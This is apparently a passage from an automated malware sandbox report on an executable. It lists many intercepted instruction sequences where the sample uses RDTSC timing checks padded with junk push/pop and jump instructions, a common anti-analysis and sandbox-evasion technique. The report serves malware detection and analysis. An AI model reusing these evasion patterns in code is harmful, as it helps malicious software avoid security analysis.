Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFD26F second address: AFD33B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FD5E912D9F8h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f pushad 0x00000010 jmp 00007FD5E912D9F1h 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007FD5E912D9F5h 0x0000001d popad 0x0000001e popad 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 jmp 00007FD5E912D9F4h 0x00000028 pop eax 0x00000029 push 00000000h 0x0000002b push eax 0x0000002c call 00007FD5E912D9E8h 0x00000031 pop eax 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 add dword ptr [esp+04h], 0000001Ah 0x0000003e inc eax 0x0000003f push eax 0x00000040 ret 0x00000041 pop eax 0x00000042 ret 0x00000043 jmp 00007FD5E912D9F1h 0x00000048 call 00007FD5E912D9E9h 0x0000004d jg 00007FD5E912D9F4h 0x00000053 push eax 0x00000054 jmp 00007FD5E912D9EAh 0x00000059 mov eax, dword ptr [esp+04h] 0x0000005d push eax 0x0000005e push edx 0x0000005f push edi 0x00000060 pushad 0x00000061 popad 0x00000062 pop edi 0x00000063 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFD33B second address: AFD35B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jp 00007FD5E9559C76h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push edi 0x0000000f push ecx 0x00000010 jo 00007FD5E9559C76h 0x00000016 pop ecx 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push ebx 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFD4CE second address: AFD4D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFD691 second address: AFD69B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD5E9559C7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFD78C second address: AFD791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B03CB0 second address: B03CB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: ABB293 second address: ABB2AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD5E912D9F6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: ABB2AD second address: ABB2B5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B30C4A second address: B30C69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FD5E912D9F3h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B30C69 second address: B30C6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B30C6F second address: B30C85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FD5E912D9EAh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B30C85 second address: B30C89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B30C89 second address: B30C8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B30F18 second address: B30F1D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B30F1D second address: B30F4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007FD5E912DA03h 0x0000000f jmp 00007FD5E912D9F7h 0x00000014 jc 00007FD5E912D9E6h 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B30F4C second address: B30F53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B310B2 second address: B310B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AC3AE1 second address: AC3AFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FD5E9559C76h 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FD5E9559C7Dh 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B36C2A second address: B36C3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD5E912D9E6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B36C3F second address: B36C45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B36C45 second address: B36C4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B3706C second address: B370A7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FD5E9559C9Bh 0x0000000c jmp 00007FD5E9559C7Ch 0x00000011 jmp 00007FD5E9559C89h 0x00000016 pop edi 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a js 00007FD5E9559C76h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B378A9 second address: B378C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD5E912D9F7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B378C4 second address: B378DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jg 00007FD5E9559C76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD5E9559C7Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B378DF second address: B378E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B378E3 second address: B378F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FD5E9559C76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B378F4 second address: B378FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B378FE second address: B37904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B3B0F8 second address: B3B0FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B3B0FE second address: B3B10D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007FD5E9559C76h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B3B10D second address: B3B111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: ABE88D second address: ABE891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: ABE891 second address: ABE8C0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD5E912D9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007FD5E912DA01h 0x00000010 jmp 00007FD5E912D9F5h 0x00000015 jg 00007FD5E912D9E6h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: ABE8C0 second address: ABE8C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B3FD35 second address: B3FD39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B3FE71 second address: B3FE76 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B3FE76 second address: B3FE7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B4073F second address: B40743 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B40743 second address: B4074C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B44B20 second address: B44B2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007FD5E9559C76h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B46243 second address: B46264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007FD5E912D9EEh 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007FD5E912D9E6h 0x00000013 jbe 00007FD5E912D9E6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B4F44B second address: B4F455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FD5E9559C76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B4EC68 second address: B4EC7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD5E912D9EFh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B4EC7D second address: B4EC85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B4EC85 second address: B4EC99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FD5E912D9E6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B4EC99 second address: B4EC9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B4EC9D second address: B4ECAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FD5E912D9E6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B4ECAB second address: B4ECB7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD5E9559C76h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B4ECB7 second address: B4ECBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B4ECBD second address: B4ECC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B4EE62 second address: B4EE67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B55BEA second address: B55BF6 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD5E9559C7Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B54606 second address: B54617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD5E912D9EDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B54617 second address: B5461D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B54777 second address: B54787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 jmp 00007FD5E912D9EAh 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B54787 second address: B54791 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD5E9559C7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B54791 second address: B547B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FD5E912D9F6h 0x0000000e je 00007FD5E912D9E6h 0x00000014 jmp 00007FD5E912D9EAh 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B547B2 second address: B547B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B547B9 second address: B547C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B5493F second address: B54951 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jl 00007FD5E9559C76h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B54A82 second address: B54A91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E912D9EBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFDA35 second address: AFDAA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E9559C7Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FD5E9559C7Ah 0x0000000f jp 00007FD5E9559C76h 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 jmp 00007FD5E9559C82h 0x0000001d nop 0x0000001e mov edx, dword ptr [ebp+122D2F1Eh] 0x00000024 push 00000004h 0x00000026 push 00000000h 0x00000028 push ecx 0x00000029 call 00007FD5E9559C78h 0x0000002e pop ecx 0x0000002f mov dword ptr [esp+04h], ecx 0x00000033 add dword ptr [esp+04h], 0000001Ah 0x0000003b inc ecx 0x0000003c push ecx 0x0000003d ret 0x0000003e pop ecx 0x0000003f ret 0x00000040 add dword ptr [ebp+122D385Eh], ecx 0x00000046 push eax 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFDAA0 second address: AFDAB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD5E912D9F0h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFDAB8 second address: AFDABC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B54D43 second address: B54D6D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD5E912D9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FD5E912D9F1h 0x0000000f jnp 00007FD5E912D9ECh 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B54D6D second address: B54D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FD5E9559C80h 0x0000000b popad 0x0000000c popad 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 jbe 00007FD5E9559C76h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B558F6 second address: B55931 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E912D9F9h 0x00000007 jmp 00007FD5E912D9F8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B55931 second address: B55941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FD5E9559C76h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B59B63 second address: B59B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B58D6D second address: B58D73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B59044 second address: B59048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B59048 second address: B590C1 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD5E9559C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jc 00007FD5E9559C76h 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FD5E9559C7Bh 0x00000018 jmp 00007FD5E9559C7Ah 0x0000001d popad 0x0000001e jg 00007FD5E9559C78h 0x00000024 popad 0x00000025 pushad 0x00000026 pushad 0x00000027 jmp 00007FD5E9559C86h 0x0000002c jmp 00007FD5E9559C7Dh 0x00000031 js 00007FD5E9559C76h 0x00000037 pushad 0x00000038 popad 0x00000039 popad 0x0000003a jmp 00007FD5E9559C86h 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B59231 second address: B59235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B59235 second address: B59239 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B59613 second address: B59634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FD5E912D9F7h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B5F256 second address: B5F26D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007FD5E9559C7Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B5F26D second address: B5F288 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD5E912D9F7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B5F288 second address: B5F2D0 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD5E9559C76h 0x00000008 jmp 00007FD5E9559C7Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FD5E9559C86h 0x00000016 jmp 00007FD5E9559C88h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B5F3F6 second address: B5F40A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007FD5E912D9E6h 0x0000000e jc 00007FD5E912D9E6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B5F585 second address: B5F5A3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jns 00007FD5E9559C76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FD5E9559C7Eh 0x00000012 pushad 0x00000013 popad 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B5FB2B second address: B5FB36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD5E912D9E6h 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B60647 second address: B60666 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD5E9559C89h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B60666 second address: B6066F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B60F4D second address: B60F5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E9559C7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B6A74C second address: B6A752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B6A752 second address: B6A756 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B6A756 second address: B6A761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B6998C second address: B69995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
